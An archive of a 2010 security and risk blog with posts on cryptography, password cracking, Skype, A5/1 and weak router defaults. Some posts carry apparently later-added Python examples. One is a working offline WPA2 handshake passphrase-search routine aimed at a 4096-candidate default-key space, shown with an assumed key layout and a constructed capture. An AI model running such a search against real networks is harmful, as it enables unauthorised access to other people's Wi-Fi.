Thursday, December 23, 2010

Calculus vs. Probability

I am trying out listening to podcasts on my – yes – iPod, during what was figuratively described to me as my “downtime”. In Zurich for me this means being on trams and trains, and walking between them or to them. So I went looking for captivating podcasts and of course ended up at the TED site, where you can download any number of interesting speakers and topics. I came across a short and poignant talk by mathematician Arthur Benjamin on his formula for changing math education.

His simple approach is to move the pinnacle of math education from calculus to probability and statistics, because while the former is beautiful yet little used, the latter two topics are in fact very practical and in high demand. In short, we need to better understand risk. Below is the full text of his short talk, where I have highlighted a few phrases in bold.

Now, if President Obama invited me to be the next Czar of Mathematics, then I would have a suggestion.

The mathematics curriculum that we have is based on a foundation of arithmetic and algebra. And everything we learn after that is building up towards one subject. And at the top of that pyramid, it's calculus. And I'm here to say that I think that that is the wrong summit of the pyramid ... that the correct summit -- that all of our students, every high school graduate should know -- should be statistics: probability and statistics. (Applause)

I mean, don't get me wrong. Calculus is an important subject. It's one of the great products of the human mind. The laws of nature are written in the language of calculus. And every student who studies math, science, engineering, economics, they should definitely learn calculus by the end of their freshman year of college. But I'm here to say, as a professor of mathematics, that very few people actually use calculus in a conscious, meaningful way, in their day to day lives. On the other hand, statistics -- that's a subject that you could, and should, use on a daily basis. Right? It's risk. It's reward. It's randomness. It's understanding data.

I think if our students, if our high school students -- if all of the American citizens -- knew about probability and statistics, we wouldn't be in the economic mess that we're in today. Not only -- thank you -- not only that ... [but] if it's taught properly, it can be a lot of fun. I mean, probability and statistics, it's the mathematics of games and gambling. It's analyzing trends. It's predicting the future. Look, the world has changed from analog to digital. And it's time for our mathematics curriculum to change from analog to digital. From the more classical, continuous mathematics, to the more modern, discrete mathematics. The mathematics of uncertainty, of randomness, of data -- and that being probability and statistics.

In summary, instead of our students learning about the techniques of calculus, I think it would be far more significant if all of them knew what two standard deviations from the mean means. And I mean it. Thank you very much. (Applause)

I could not agree more. The world is discrete for me, and very few of the problems that I encounter succumb to integration.

Protecting Your Information in the Age of WikiLeaks

This is the title of a webcast invitation that I recently received from Symantec. The WikiLeaks saga is quickly impacting the infosec landscape, probably because the issue is so visible to all levels of senior management. The webcast is described as follows:
In the wake of the intense media attention around the WikiLeaks disclosures, you may be asking yourself, "What steps can I take to help my company avoid this same fate?"

Symantec has been working with customers who are concerned about preventing these same issues and we’ve developed a set of best practices that can help defend against these types of breaches. We’d like to share with you some of the techniques that might be useful to help you uncover similar activity on your own systems. In this live webcast we’ll:
• Discuss the threat agents and modes of data loss you should be most concerned about
• Recommend counter-measures to protect your critical information against these risks

2011 InfoSec Predictions from Zscaler Labs

It's not only the season of giving but of forecasting as well, and I recently received the following information security predictions from Zscaler Labs:
• Flash mob hacktivism – we’ll see more attacks similar to Operation Payback, where like-minded strangers quickly organize and attack corporations or government entities in the name of a cause
• Niche malware designed to harvest confidential information from IP-connected devices such as printers and SCADA systems will grow
• Cloud-hosted botnets will grow
• We’ll hear about more indirect data breaches, where it’s not the company affected that was breached, but rather a third-party vendor or organization
• Social networks will become the main communication medium for attackers
• The Information security market will continue to shrink
An interesting list - more about trends than fundamentals - and you can find more details on the Zscaler blog.

Over 1,000 visits this month to old AES-256 post

Just a note to say that my Are AES 256-bit keys too large? post from July 2008 has been visited over 1,000 times this month. For the last few years it has been my most popular post by far, and I once referred to it as one of my Pareto posts. Probably what happened this month is a link to the post found its way onto some social channel, like Twitter, and just mushroomed from there. It just shows that content really has no use-by date in Web 2.0.

Tuesday, December 14, 2010

Tutorial on Buffer Overflows

Nice tutorial on this perennial security problem from Patrick Schaller of ETH, Zurich.

Tuesday, December 7, 2010

Internet Privacy as a Venn diagram

From Flowing Data:

Monday, December 6, 2010

Snakes in Suits – the risks from psychopaths in the workplace

A telling presentation from Holly Andrews at a recent IRM meeting on dealing with psychopaths in the workplace (and yes, the boardroom), derived from the 2006 book Snakes in Suits: When Psychopaths Go to Work. The presentation describes how workplace psychopaths burrow into positions of power and, amongst other things, assume more risk than is sensible. There is a wonderful process chart which shows how such people operate.

Transitional organisations can be seen as ideal “feeding grounds” for psychopaths since

• There are fewer constraints and rules, allowing the psychopath freedom in acting out their psychopathic manipulation
• The fast changing environment provides stimulation for the psychopath whilst serving to cover up their failings
• There is the potential for large rewards in terms of money, power, status and control

Thursday, October 28, 2010

Just over 100,000 reads of my Scribd documents

Just a note to say that the total number of reads of my documents on Scribd has just passed 100,000! The categories are given below, mostly PDFs and a few PowerPoint presentations.

Tuesday, September 14, 2010

BP and Trial by PageRank

Over at the NSIS, Alex has a post (downgraded to a rant?) which begins with berating Gideon Rasmussen for calling the BP Deepwater incident a Black Swan, and ends up discussing flaws in corporate governance. Alex correctly describes the incident as a “tail event”, both low probability and high impact but still “on the curve”. True Black Swans are events for which prior distributions are “completely uninformative”, and they belong on a totally different curve to expectations and models.

Even so, for me a Black Swan aspect of the incident has been the subsequent reputational damage to BP. This has not been a trial by public media, but trial by social media and ultimately, trial by PageRank. In web 2.0 there is no such thing as yesterday’s news, or yesterday’s newspapers wrapping up today’s fish and chips. Links are just as good today as they were yesterday, and continue to remain search-worthy far into the future as long as PageRank deems them to be so. Holding steady at approximately two thirds of the search market, Google via PageRank has become the default arbiter of Internet truth.

A recent article called What Big Brands are Spending on Google from Advertising Age showed that BP’s spending on Google Ads increased dramatically, to almost $3.6 million in June, up from its regular budget of less than $60,000.

That’s almost a 6000% increase in spending at the height of BP's counter-PageRank campaign, and such unpredictable jumps are the calling cards of Black Swans. From the article:

Before BP could stem the oil gusher at the bottom of the Gulf of Mexico, it unleashed $100 million in ad spending, largely on network TV, to stem the damage to its image. But it also started spending heavily where it had never spent much before: buying ads in Google's search results.

Friday, September 10, 2010

Keyword Spamming with Infographics

Infographics have become more popular, and BuzzFeed has produced an infographic describing how infographics are used to generate keyword spam: the embed code that comes with the graphic carries a keyword-rich link back to the spammer's site, and every site that embeds it passes PageRank to that link. The trick to stopping the spam appears to be adding rel="nofollow" to that link in the embed HTML, so that search engines do not count it.

References to Homomorphic Encryption

Homomorphic encryption is the basis of Craig Gentry’s recent breakthrough in computing on encrypted data, and hence in encrypted search. Helger Lipmaa has a large collection of papers on homomorphic encryption here, as well as other cryptographic topics. Knock yourself out.

Five Lectures on Anonymous Communications

George Danezis has put together a great series of lectures on modern anonymous communications, available from his Conspicuous Communication blog here. The lectures cover

1. Basic definitions & unconditional anonymity with DC-networks.
2. Long-term attacks on anonymity systems (Statistical / Disclosure) and their Bayesian formulation.
3. Mix networks and anonymity metrics.
4. The Bayesian traffic analysis of mix networks.
5. Low-latency anonymity with onion routing and crowds.

Sunday, September 5, 2010

How to render SSL Useless – video version

A while back I posted on the How to render SSL Useless deck from Ivan Ristic of SSL Labs (now with Qualys) on common mistakes in the deployment of SSL. There is now a video of Ivan presenting this deck at a recent OWASP conference, available at ThreatPost.

I just came across HeadHacker, a site devoted to social engineering, run by a former colleague Dale Pearson. The site looks great and Dale will be a speaker at the upcoming hashdays conference in Lucerne this November.

Will there be an IT Risk Management 2.0?

This is the title of a short talk I gave recently at an OWASP chapter meeting in Zurich. The audience was small but engaged, and I went over time by quite a bit. I need to develop the talk further but it is a decent v1.0.

Saturday, August 28, 2010

The Blank Swan

There is a new book, published in April, called The Blank Swan: The End of Probability. This is a clever title and the front photo is wonderful as well.

The book seems to be saying that financial market processes simply cannot be captured using the conventional notions of probability. The author writes in summary

The current crisis has led us to a conceptual impasse regarding the financial market. No prediction model can apply to the market …

Probability has to be discarded and a new category has to emerge instead, which will mediate contingency …

In fact, the market has nothing to do with Wall Street or with the investment banks. Market-making is a creative activity. The market is a category of thought that is independent of ideology. It replaces probability altogether and discarding the market, like the philosophers of the radical change claim we should do, is like discarding probability!

Not a very positive review from Reading the Markets, who found the book quite hard to read. There is some discussion on a Wilmott mailing list as well.

Searching an Encrypted Cloud

There is a post over at the Enterprise Search blog with some pointers to encrypted search, including my own overview. There is a link to a whitepaper from Seny Kamara and Kristin Lauter of the Microsoft Research Cryptography Group, proposing an architecture for a virtual private storage service which supports the following properties

• confidentiality
• integrity
• non-repudiation
• availability
• reliability
• efficient retrieval
• data sharing

Cool A5/1 back-clocking graphic

Below is part of a graphic which depicts the A5/1 state space generated when checking if the correct key has been determined from a rainbow table lookup. Once a key candidate has been found using the rainbow tables, the A5/1 cipher needs to be advanced (forward clocked) and undone (back-clocked) to verify that the candidate key is correct.

The grey paths represent states that are not accessible through forward clocking, and the green paths have many ancestor states leading to the same key stream. Red paths have few ancestor states leading to the same key stream. The graphic is from the A5/1 rainbow table generation project led by Karsten Nohl.
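As an added illustration (this is not code from Nohl's project), here is a small Python model of A5/1 that runs in both directions. clock() advances the 64-bit state under the majority rule, and predecessors() back-clocks it: for each of the four clocking patterns the majority rule allows, it inverts the registers that would have moved and keeps the candidate only if that candidate's own clocking bits would in fact have produced that pattern. Because the bit shifted out of the top of each LFSR is also a feedback tap, the previous contents of a clocked register are fully determined by the bit that was shifted in, so a state has between zero and four predecessors. A state with none is a grey path (unreachable by forward clocking); a state with several is where the green paths branch. The two fixed states in the test were chosen by hand to hit both extremes; register lengths, taps and clocking bits are the published A5/1 parameters.

```python
"""A5/1 forward clocking and back-clocking (predecessor enumeration).

Added example, not from the rainbow-table project. Register lengths, feedback
taps and clocking bits are the published A5/1 parameters.
"""
import random

# (length, feedback taps, clocking bit) for R1, R2, R3; the top bit is always a tap.
REGS = (
    (19, (13, 16, 17, 18), 8),
    (22, (20, 21), 10),
    (23, (7, 20, 21, 22), 10),
)

# Clocking patterns the majority rule can produce: at least two registers move.
PATTERNS = ((1, 1, 0), (1, 0, 1), (0, 1, 1), (1, 1, 1))


def _bit(x, i):
    return (x >> i) & 1


def _shift(reg, n, taps):
    """One step of a single LFSR: shift left, insert the feedback bit at position 0."""
    fb = 0
    for t in taps:
        fb ^= _bit(reg, t)
    return ((reg << 1) | fb) & ((1 << n) - 1)


def _unshift(reg, n, taps):
    """Invert _shift: the discarded top bit is a tap, so it is recoverable from bit 0."""
    low = reg >> 1
    top = _bit(reg, 0)
    for t in taps:
        if t != n - 1:
            top ^= _bit(low, t)
    return low | (top << (n - 1))


def clock_pattern(state):
    """Which registers advance on the next clock, by the majority of the clocking bits."""
    bits = [_bit(r, cb) for r, (_, _, cb) in zip(state, REGS)]
    maj = 1 if sum(bits) >= 2 else 0
    return tuple(1 if b == maj else 0 for b in bits)


def clock(state):
    """Forward-clock the state once; returns (new_state, keystream_bit)."""
    pat = clock_pattern(state)
    new = tuple(_shift(r, n, taps) if c else r
                for r, (n, taps, _), c in zip(state, REGS, pat))
    out = 0
    for r, (n, _, _) in zip(new, REGS):
        out ^= _bit(r, n - 1)
    return new, out


def predecessors(state):
    """All states that forward-clock to `state` (between 0 and 4 of them)."""
    preds = []
    for pat in PATTERNS:
        cand = tuple(_unshift(r, n, taps) if c else r
                     for r, (n, taps, _), c in zip(state, REGS, pat))
        if clock_pattern(cand) == pat:      # the pattern must be self-consistent
            preds.append(cand)
    return preds


def random_state(rng):
    return tuple(rng.getrandbits(n) for n, _, _ in REGS)


def round_trip_ok(samples=500, seed=1):
    """Every state must appear among the predecessors of its own successor."""
    rng = random.Random(seed)
    for _ in range(samples):
        s = random_state(rng)
        if s not in predecessors(clock(s)[0]):
            return False
    return True


def predecessor_histogram(samples=4000, seed=1):
    """Counts of states with 0..4 predecessors over random states."""
    rng = random.Random(seed)
    hist = [0] * 5
    for _ in range(samples):
        hist[len(predecessors(random_state(rng)))] += 1
    return hist


if __name__ == "__main__":
    print("no predecessor :", predecessors((512, 2048, 1024)))
    print("four predecessors:", predecessors((512, 2048, 2048)))
    print("histogram 0..4  :", predecessor_histogram())
```

On random states the share with no predecessor works out to 3/8: the three clocking bits of the candidates must not all agree, and the register that stood still must then match the majority, which happens half the time. The histogram reproduces that, and the average number of predecessors is one, as it must be for any map of a finite set to itself.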

Friday, August 27, 2010

GPU Judgement Day for short Passwords

Researchers from the Georgia Tech Research Institute have announced that the power of GPU processors now poses a real threat to password security, and by implication, to the security of critical IT infrastructure. Top of the line GPU devices now process at around 2 teraflops, which is roughly 30% of the computing power the fastest computing cluster could muster 10 years ago for a price tag of over $100 million. Given that the main GPU manufacturers have made their devices programmable through standard C libraries, password cracking has become democratized.

The researchers state that 7-character passwords are now totally insecure against exhaustive attacks and recommend 12 characters, drawn from the full 94 printable keyboard characters. GPU processors can also be used to generate rainbow tables for offline password cracking, which was the approach taken recently by Karsten Nohl's project to build A5/1 rainbow tables on CUDA nodes.

Of course, applying GPU devices to password cracking is not new, and Elcomsoft has made a name for itself using high-end gaming chips to recover and benchmark passwords. I am a little surprised that the researchers did not mention this. In any case, Elcomsoft has a great blog and you can find a good presentation on GPU password cracking here.

From my post The spin on passwords for AES

Adding spin to password-based computations is a workaround to the unpleasant fact that human habits and memory are vastly outmoded in today's IT environment. Everything is getting faster, better and cheaper - except us. Passwords remain the most toxic asset on the security balance sheet, but don't expect a bailout any time soon.
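The "spin" referred to above is key stretching, and the arithmetic of the 7-versus-12-character recommendation is worth seeing next to it. The Python below is an added example, not from the Georgia Tech announcement or the Elcomsoft material: it computes the exhaustive-search cost of a password class at an assumed guess rate (1e9 guesses per second stands in for a GPU rig; the real figure depends on the hash and the hardware), and then shows how many PBKDF2 iterations would be needed to drag the 7-character case out to a chosen number of years. The verification routine at the end is the same stretched hash used on the defending side.

```python
"""Exhaustive-search cost versus password length, and key stretching as the workaround.

Added example, not from the Georgia Tech announcement. The guess rate is an
assumed parameter standing in for a GPU cracking rig.
"""
import hashlib
import hmac
import math
import os

PRINTABLE = 94            # printable ASCII characters the researchers recommend drawing from
YEAR = 365.25 * 86400     # seconds in a Julian year


def keyspace(alphabet_size, length):
    return alphabet_size ** length


def entropy_bits(alphabet_size, length):
    return length * math.log2(alphabet_size)


def seconds_to_exhaust(alphabet_size, length, guesses_per_second, iterations=1):
    """Worst-case time to try every password; `iterations` is the stretching factor."""
    return keyspace(alphabet_size, length) * iterations / guesses_per_second


def iterations_for_target(alphabet_size, length, guesses_per_second, target_years):
    """Smallest stretching factor that makes exhausting the class take at least target_years."""
    needed = target_years * YEAR * guesses_per_second / keyspace(alphabet_size, length)
    return max(1, math.ceil(needed))


def stretched_hash(password, salt, iterations):
    """PBKDF2-HMAC-SHA256: every verification, and every attacker guess, costs `iterations` HMACs."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations, dklen=32)


def verify(password, salt, iterations, stored):
    """Constant-time comparison of a freshly stretched password against the stored value."""
    return hmac.compare_digest(stretched_hash(password, salt, iterations), stored)


if __name__ == "__main__":
    rate = 1e9   # assumed guesses per second
    for n in (7, 12):
        years = seconds_to_exhaust(PRINTABLE, n, rate) / YEAR
        print(f"{n} chars: {entropy_bits(PRINTABLE, n):.1f} bits, {years:.3g} years at {rate:.0e}/s")
    iters = iterations_for_target(PRINTABLE, 7, rate, 10)
    print(f"stretching factor to hold a 7-char password for 10 years: {iters}")
    salt = os.urandom(16)
    stored = stretched_hash("correct horse", salt, iters)
    print(verify("correct horse", salt, iters, stored), verify("wrong guess", salt, iters, stored))
```

At 1e9 guesses per second the full 7-character class falls in about 18 hours, while 12 characters take on the order of ten million years; a few thousand PBKDF2 iterations buy the 7-character class a decade against that same rig, at the cost of the same work on every legitimate login, which is the trade the quoted paragraph is complaining about.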

De-obfuscating the RC4 layer of Skype

Sean O'Neil, a security developer (or at least an amateur one), has posted code that is binary-compatible with an obfuscated version of RC4 that is used to protect Skype control traffic (user searches, profiles, contact lists). O’Neil says that the obfuscated version of RC4 is keyless and serves no useful security purpose, but its presence is intended to render Skype incompatible with other messaging clients, effectively making it a proprietary system. Even though Skype was intending to open its APIs to all desktop clients soon enough, O’Neil sees himself as the buster of Skype’s 10 year monopoly.

The story is being widely reported in the press (see links below), and it is easy to assume that the general security of Skype has been compromised, especially when O’Neil’s own post carried the title Skype’s Biggest Secret Revealed. But the secret was disentangling the modified version of RC4 from Skype’s operation. User privacy remains protected since full strength versions of AES-256, RSA-1024 and RSA-2048 are used to encrypt session traffic. The code itself is surely obfuscated since the source is over 2800 lines of C, when 50 or so is enough to implement RC4.

The full implications of the discovery are still playing out, and whether losing their biggest secret poses a serious issue for Skype. O’Neil is promising to release more details at the Chaos Communication Conference in Berlin this December.

Thursday, August 26, 2010

Uno, dos, DDoS

Here is a Flash rendering of a FreeMind map I made from the excellent post Surviving Cyber War: A Primer on DDoS by Richard Stiennon, which appeared last November. The post traces the history of DDoS, looks at the people and technologies involved, and tells the story of the unlikely (then) 25-year-old hero Barrett Lyon.

Wednesday, August 25, 2010

IT Security Trends FreeMind map from 2008

I recently uploaded a large FreeMind map that I collected over 2008, in an effort to get a handle on the stream of security articles, reports and incidents taking place back then. In short there was a torrent and it remains much the same today. I think you might find the ad hoc classification of material useful, as well as the groups of sources.

Note that links to items from FIRST (Forum of Incident Response and Security Teams) are now broken since their once excellent news service has been discontinued.

All sources for my security and risk FreeMind maps are available here.

12 bits of default entropy for Speedport WPA routers

The H has reported that the default WPA key settings for the Speedport W 700V ADSL Wi-Fi routers are weak, since at most 4096 guesses are required to recover the key. The key is mostly populated with a collection of fixed fields (for example, keys always begin with the prefix "SP-") and other public information such as the MAC address of the router, leaving only 12 bits that an attacker does not already know. The devices are apparently supported by all major German telecoms, and presumably popular amongst the 26 million or so German households that have wireless. Of course the owners of the routers can change the default WPA key, but it's a safe bet that most people need to be reminded of this precaution. Germany's highest court recently ruled that operators must password-protect their wireless networks, which is not a good sign that strong passwords are the norm.
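To show what 12 bits of unknown key material means in practice, the Python below is an added example that walks a 4096-candidate passphrase space against a WPA2 four-way handshake. It is not The H's analysis, and the key layout it enumerates ("SP-" followed by the last three octets of the MAC and three hex digits) is an assumed stand-in, not the real Speedport format. The derivation steps are the standard ones: PMK by PBKDF2-HMAC-SHA1 over the SSID, KCK as the first 16 bytes of the PTK from the 802.11i PRF, and the EAPOL MIC as truncated HMAC-SHA1. The handshake itself is constructed in the block from a known passphrase so the example runs offline.

```python
"""Offline search of a 4096-candidate WPA2-PSK space against a 4-way handshake.

Added example. The candidate key layout is assumed (not the real Speedport
format) and the "capture" is constructed here from a known passphrase.
"""
import hashlib
import hmac


def pmk(passphrase: str, ssid: str) -> bytes:
    """WPA/WPA2-PSK pairwise master key: PBKDF2-HMAC-SHA1, 4096 iterations, 256 bits."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    """IEEE 802.11i PRF-n: concatenated HMAC-SHA1(key, label || 0x00 || data || counter)."""
    out = b""
    i = 0
    while len(out) < nbytes:
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        i += 1
    return out[:nbytes]


def kck(pmk_: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """First 16 bytes of the PTK: the key confirmation key that MICs the EAPOL frames."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf(pmk_, b"Pairwise key expansion", data, 48)[:16]


def eapol_mic(kck_: bytes, eapol: bytes) -> bytes:
    """Key descriptor version 2 (WPA2/CCMP): the MIC is HMAC-SHA1 truncated to 16 bytes."""
    return hmac.new(kck_, eapol, hashlib.sha1).digest()[:16]


def zero_mic(eapol: bytes) -> bytes:
    """The 16-byte MIC field at offset 81 of an EAPOL-Key frame is zeroed before MIC computation."""
    return eapol[:81] + bytes(16) + eapol[97:]


def speedport_candidates(mac_suffix: str):
    """Assumed default-key layout: fixed prefix + public MAC octets + 12 unknown bits."""
    for n in range(4096):
        yield f"SP-{mac_suffix}{n:03X}"


def recover_psk(capture: dict, candidates):
    """Returns the passphrase whose derived KCK reproduces the captured MIC, else None."""
    for passphrase in candidates:
        k = kck(pmk(passphrase, capture["ssid"]), capture["aa"], capture["spa"],
                capture["anonce"], capture["snonce"])
        if hmac.compare_digest(eapol_mic(k, capture["eapol"]), capture["mic"]):
            return passphrase
    return None


def make_capture(passphrase, ssid, aa, spa, anonce, snonce, eapol):
    """Constructed fixture standing in for a sniffed handshake message 2 (client -> AP)."""
    zeroed = zero_mic(eapol)
    k = kck(pmk(passphrase, ssid), aa, spa, anonce, snonce)
    return {"ssid": ssid, "aa": aa, "spa": spa, "anonce": anonce, "snonce": snonce,
            "eapol": zeroed, "mic": eapol_mic(k, zeroed)}


# Constructed sample values, not from a real network or capture.
SAMPLE = make_capture(
    "SP-AABBCC025", "WLAN-AABBCC",
    bytes.fromhex("001122aabbcc"), bytes.fromhex("00aabbccddee"),
    bytes(range(32)), bytes(range(32, 64)),
    bytes(range(99)),
)

if __name__ == "__main__":
    print(recover_psk(SAMPLE, speedport_candidates("AABBCC")))   # SP-AABBCC025
```

Each candidate costs one PBKDF2 run of 4096 iterations, so the whole space is a few seconds of CPU time and far less on a GPU; the same code against a 12-character random passphrase would be hopeless, which is the whole difference between a default key and a chosen one.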

How to reason about IT Security Risks

I have been meaning for some time to post a link to this wonderful paper from late 2007 on the top information security risks for the then coming year. The paper was a collaborative work from several groups of security professionals, led by Gary Hinson, keeper of the fantastic NoticeBored site of security awareness material. The paper is excellent in that it clearly separates threats, vulnerabilities and impacts, and then creates risks as scenarios from the interplay of these three collections, with controls coming as final recommendations. The whole approach just seems so clean and sensible, and demonstrates the distinctions amongst risk terms which sometimes get lost in our daily language.

Now added to my IT Risk collection on Scribd, thanks to Gary Hinson for removing the copyright protection.

Tuesday, August 24, 2010

Recent PhD Thesis on IT Risk Management

The 2008 PhD thesis of Domenico Salvati from the Laboratory for Safety Analysis at ETH, Zurich, on the Management of Information System Risks is available online. Salvati presents a structured approach to the IT risk management process which has some novel differences as compared to the more familiar frameworks. The thesis contains long worked examples on computing the risk of a brute force password attack and the risk of phishing attacks. The work has a very practical flavour, as Salvati was sponsored by Credit Suisse for the thesis, as part of ZISC.

You can find a short bio on Domenico as part of the upcoming hashdays security and risk conference in Zurich.

Thursday, August 19, 2010

Evidence that the McEliece Cryptosystem is resistant to Quantum Computing Attacks

A paper was posted on the preprint server Physics arXiv showing that the McEliece public key cryptosystem is resistant to efficient quantum algorithms based on the ideas of Shor’s algorithm, which famously yielded an efficient method for factoring integers. From the abstract

Quantum computers can break the RSA and El Gamal public-key cryptosystems, since they can factor integers and extract discrete logarithms. If we believe that quantum computers will someday become a reality, we would like to have post-quantum cryptosystems which can be implemented today with classical computers, but which will remain secure even in the presence of quantum attacks. In this article we show that the McEliece cryptosystem over rational Goppa codes resists precisely the attacks to which the RSA and El Gamal cryptosystems are vulnerable---namely, those based on generating and measuring coset states.

Shor’s algorithm is a general method for computing the period of certain functions, and it can be applied to computing the orders of elements modulo a composite number, for example (see my post Quantum Computing: are you Shor? for some details). Underneath, it works by preparing coset states of a hidden subgroup and measuring them with the quantum Fourier transform. Shor’s algorithm is not directly applicable to the McEliece cryptosystem, since it is based on a hard problem from coding theory which is not obviously solvable by computing periods of functions. The new paper argues that no such route exists: the natural way of casting the McEliece private key as a hidden subgroup produces coset states from which that measurement extracts nothing useful.

However the authors caution that there may be another quantum approach, distinct from the principles of Shor’s algorithm, that efficiently breaks the McEliece cryptosystem. On the other hand, there is a growing consensus that NP-complete problems do not have efficient quantum algorithms (see the diagram in this post), and general decoding of a linear code, the problem underlying McEliece, is NP-hard (which means it is at least as hard as an NP-complete problem). One caveat: NP-hardness is a worst-case statement about arbitrary codes, whereas McEliece additionally relies on the disguised Goppa code being indistinguishable from a random one, so the NP-hardness result is reassurance rather than a proof of security.

There is also a nice background post on the physics arXiv blog.
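To make the structure of the cryptosystem concrete, here is a toy McEliece in Python, added here as an illustration and not taken from the paper. It uses the [7,4] Hamming code, which corrects a single error, in place of a binary Goppa code with n in the thousands and t around fifty, but the mechanics are the same: a code with an efficient secret decoder is hidden behind a random invertible matrix S and a random permutation P, the public generator S·G·P looks like a random code, encryption adds t deliberate errors, and decryption undoes P, decodes with the secret structure, and undoes S. The parameters are far too small to be secure and are for illustration only.

```python
"""Toy McEliece over the [7,4] Hamming code (t = 1). Added example, not from the paper.

Real McEliece uses binary Goppa codes with n in the thousands and t around 50;
the construction below keeps the structure and shrinks everything else.
"""
import random

# Systematic generator G = [I | A] and parity-check H = [A^T | I] of the Hamming [7,4] code.
G = [[1, 0, 0, 0, 1, 1, 0],
     [0, 1, 0, 0, 1, 0, 1],
     [0, 0, 1, 0, 0, 1, 1],
     [0, 0, 0, 1, 1, 1, 1]]
H = [[1, 1, 0, 1, 1, 0, 0],
     [1, 0, 1, 1, 0, 1, 0],
     [0, 1, 1, 1, 0, 0, 1]]
K, N = 4, 7


def matmul(a, b):
    """Matrix product over GF(2)."""
    return [[sum(a[i][k] & b[k][j] for k in range(len(b))) & 1
             for j in range(len(b[0]))] for i in range(len(a))]


def transpose(m):
    return [list(col) for col in zip(*m)]


def inverse(m):
    """Gauss-Jordan inverse over GF(2); None if the matrix is singular."""
    n = len(m)
    aug = [row[:] + [int(i == j) for j in range(n)] for i, row in enumerate(m)]
    for col in range(n):
        piv = next((r for r in range(col, n) if aug[r][col]), None)
        if piv is None:
            return None
        aug[col], aug[piv] = aug[piv], aug[col]
        for r in range(n):
            if r != col and aug[r][col]:
                aug[r] = [x ^ y for x, y in zip(aug[r], aug[col])]
    return [row[n:] for row in aug]


def hamming_decode(word):
    """Syndrome decoding: the syndrome equals the column of H at the flipped position."""
    s = [sum(H[i][j] & word[j] for j in range(N)) & 1 for i in range(N - K)]
    if any(s):
        word = word[:]
        word[transpose(H).index(s)] ^= 1
    return word


def keygen(rng):
    """Private: (S, P). Public: S*G*P, which hides the Hamming structure."""
    while True:
        S = [[rng.randint(0, 1) for _ in range(K)] for _ in range(K)]
        if inverse(S) is not None:
            break
    perm = list(range(N))
    rng.shuffle(perm)
    P = [[int(perm[i] == j) for j in range(N)] for i in range(N)]
    return matmul(matmul(S, G), P), (S, P)


def encrypt(public, m, rng):
    """c = m*S*G*P + e with exactly t = 1 error."""
    c = matmul([m], public)[0]
    c[rng.randrange(N)] ^= 1
    return c


def decrypt(private, c):
    S, P = private
    c = matmul([c], transpose(P))[0]    # undo the permutation (P^-1 = P^T)
    cw = hamming_decode(c)              # strip the error using the secret decoder
    return matmul([cw[:K]], inverse(S))[0]   # G is systematic: first K bits are m*S


def roundtrip_all_messages(seed=1):
    """Encrypt and decrypt every 4-bit message under one key pair."""
    rng = random.Random(seed)
    public, private = keygen(rng)
    for i in range(2 ** K):
        m = [(i >> b) & 1 for b in range(K)]
        if decrypt(private, encrypt(public, m, rng)) != m:
            return False
    return True


if __name__ == "__main__":
    print(roundtrip_all_messages())   # True
```

Note what an attacker who holds only the public matrix faces: decoding an arbitrary-looking [7,4] code with one error is trivial at this size, but for a code with n in the thousands the known decoding algorithms are exponential in t, and the S and P disguise is what stops the attacker from reusing the Goppa decoder.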

Tuesday, August 17, 2010

Imperva recently announced an update to their analysis of the 32 million passwords that were exposed by the RockYou site earlier this year. The update is concerned with a specific analysis of the Spanish passwords included in the breach, of which there were just over 2 million. Imperva, together with the Spanish marketing firm Agua Marketing, found the following breakdown of password preferences – note that almost half of the passwords are based on personal names.

The full report in Spanish is here.

Sunday, August 15, 2010

Short cryptography lecture from Scott Aaronson

Here is a short cryptography lecture from Scott Aaronson, delivered as part of his Quantum Computing Since Democritus course given at the University of Waterloo, Fall 2006. The lecture gives a short text-based overview of crypto from mainly a complexity point of view, and discusses some of the implications of the “P = NP?” question for crypto.

Tuesday, August 3, 2010

Recent spike in reads of AES posts

Just a note to say that over the last few days there has been a jump in reads on a few of my AES posts, in particular for Are AES 256-bit keys too large? and AES-256 and Reputational Risk. I can't find any obvious reason why, however these posts do appear amongst the top google search results for "aes 256" or "aes-256".

Friday, June 11, 2010

Detecting SSL/TLS legacy session Renegotiation

Back in November I posted on The TLS Renegotiation Attack for the Impatient, which I hoped was a plain English explanation of this new weakness in SSL and TLS (at the end of the post you can find less plain explanations and links). The weakness was quickly addressed by the IETF a few months later. There is a new review of the attack from nCircle and also a link to the detailed steps that can be taken to specifically detect servers which still run legacy versions of the protocols susceptible to the attack.

Saturday, May 29, 2010

The half-life of a YouTube video is 6 Days

A very interesting chart from Business Insider which shows that a YouTube video gets half its views in the first 6 days of it being published, down from 14 days in 2008. By way of comparison, computer vulnerabilities have a half-life closer to 30 days, meaning that our video attention span is much shorter than our patching cycles.

The data is provided by TubeMogul.

Thursday, May 27, 2010

I recently posted in The Search for Encrypted Search an overview of the breakthrough last year made by Craig Gentry of IBM to search data while it is in encrypted form. The breakthrough was largely theoretical since the required computational overhead to support encrypted search is huge, which for example would increase the time for a Google search by roughly a factor of a trillion.

In such cases, it is always an open question as to whether the breakthrough will stand as an unimprovable milestone, or be the beginning of series of improvements towards a practical solution. We now have the first evidence that we are dealing with the latter case for encrypted search.

A press release from the University of Bristol in the UK reports that

Nigel Smart, Professor of Cryptology in the Department of Computer Science at the University of Bristol, will present a paper in Paris this week [Friday 28 May], which makes a step towards a fully practical system to compute on encrypted data. The work could have wide ranging impact on areas as diverse as database access, electronic auctions and electronic voting.

Professor Smart said: “We will present a major improvement on a recent encryption scheme invented by IBM in 2009.”

“Our scheme allows for computations to be performed on encrypted data, so it may eventually allow for the creation of systems in which you can store data remotely in a secure manner and still be able to access it.”

Together with Frederik Vercauteren, from the Katholieke Universiteit Leuven in Belgium, Smart has simplified Gentry’s scheme so that it becomes more practical - not totally so, but an improvement. More information should be available after the paper is published.
